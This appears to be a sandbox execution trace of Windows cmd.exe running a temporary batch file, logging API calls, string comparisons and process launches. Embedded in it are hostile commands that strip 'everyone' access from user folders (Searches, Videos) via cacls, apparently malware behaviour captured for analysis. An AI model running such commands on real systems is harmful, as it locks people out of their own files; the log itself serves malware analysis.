_String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.895] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.896] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.896] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.896] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Searches\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Users\\5JgHKoaOfdp\\Searches\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"C:\\Users\\5JgHKoaOfdp\\Searches\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0xb80, dwThreadId=0xb84)) returned 1 [0035.912] CloseHandle (hObject=0x80) returned 1 [0035.913] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.913] GetEnvironmentStringsW () returned 0xd1b020* [0035.913] FreeEnvironmentStringsA (penv="=") returned 1 [0035.913] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.913] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0035.913] _close (_FileHandle=4) returned 0 [0035.913] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0035.962] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.963] CloseHandle (hObject=0x94) returned 1 [0035.963] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0035.978] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0035.978] CloseHandle (hObject=0x8c) returned 1 [0035.978] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.978] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.978] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.978] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.978] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.978] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.978] SetConsoleInputExeNameW () returned 0x1 [0035.978] GetConsoleOutputCP () returned 0x1b5 [0035.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.979] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.979] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c [0035.979] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0035.979] _get_osfhandle (_FileHandle=3) returned 0x8c [0035.979] SetFilePointer (in: hFile=0x8c, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0035.979] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0035.979] ReadFile (in: hFile=0x8c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x6d0, lpOverlapped=0x0) returned 1 [0035.979] SetFilePointer (in: hFile=0x8c, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0035.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n\n\r\n=%%i\r\n") returned 62 [0035.979] GetFileType (hFile=0x8c) returned 0x1 [0035.979] _get_osfhandle (_FileHandle=3) returned 0x8c [0035.979] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0035.979] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.980] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.980] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.980] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.980] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.980] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.980] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.980] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.980] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0035.980] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0035.980] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0035.980] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0035.980] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0035.980] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0035.980] _tell (_FileHandle=3) returned 988 [0035.980] _close (_FileHandle=3) returned 0 [0035.980] _pipe (in: _PtHandles=0xd25fa0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25fa0) returned 0 [0035.980] _dup (_FileHandle=1) returned 5 [0035.980] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0035.980] _close (_FileHandle=4) returned 0 [0035.980] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.980] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.980] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.980] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.980] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.980] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.980] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.980] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.980] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.981] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.981] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.981] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.981] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.981] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.981] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.981] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.981] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.981] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.981] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.981] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.981] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.981] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0035.981] SetErrorMode (uMode=0x0) returned 0x0 [0035.981] SetErrorMode (uMode=0x1) returned 0x0 [0035.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18268, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0035.981] SetErrorMode (uMode=0x0) returned 0x1 [0035.981] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0035.981] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.981] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.981] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183a8 [0035.981] FindClose (in: hFindFile=0xd183a8 | out: hFindFile=0xd183a8) returned 1 [0035.981] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0035.981] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0035.981] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.982] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.982] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.982] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.982] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.982] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.982] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0xb88, dwThreadId=0xb8c)) returned 1 [0035.986] CloseHandle (hObject=0x94) returned 1 [0035.986] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.986] GetEnvironmentStringsW () returned 0xd15f98* [0035.986] FreeEnvironmentStringsA (penv="=") returned 1 [0035.987] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.987] _get_osfhandle (_FileHandle=3) returned 0x8c [0035.987] DuplicateHandle (in: hSourceProcessHandle=0x80, hSourceHandle=0x8c, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0035.987] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0035.987] _close (_FileHandle=5) returned 0 [0035.987] _dup (_FileHandle=0) returned 4 [0035.987] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0035.987] _close (_FileHandle=3) returned 0 [0035.987] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.987] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.987] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.987] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.987] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.987] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.987] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.987] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.987] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.987] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.987] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.987] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.987] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.987] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.987] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.987] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.987] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.987] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.987] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.987] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.987] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.987] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.987] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.987] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.987] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.987] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.987] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.987] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.987] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.987] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.987] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.987] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.987] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.987] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.987] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.987] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.987] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.987] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.987] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.988] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.988] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.988] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.988] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.988] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.988] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.988] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.988] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.988] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.988] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.988] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.988] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.988] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.988] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.988] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.988] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.988] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.988] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.988] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.988] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.988] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.988] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.988] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.988] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.988] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.988] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.988] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.988] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.988] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.988] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.988] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.988] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.988] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.988] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.988] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.988] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.988] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.988] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.988] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.988] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.988] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.988] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.988] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.988] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.988] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.988] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0035.988] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0035.988] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0035.988] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.988] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.989] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.989] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.989] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.989] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.989] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.989] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.989] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.989] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.989] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.989] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.989] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.989] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.989] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.989] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.989] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.989] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.989] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.989] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.989] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.989] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.989] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.989] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.989] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.989] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.989] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.989] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.989] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.989] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.989] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.989] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.989] 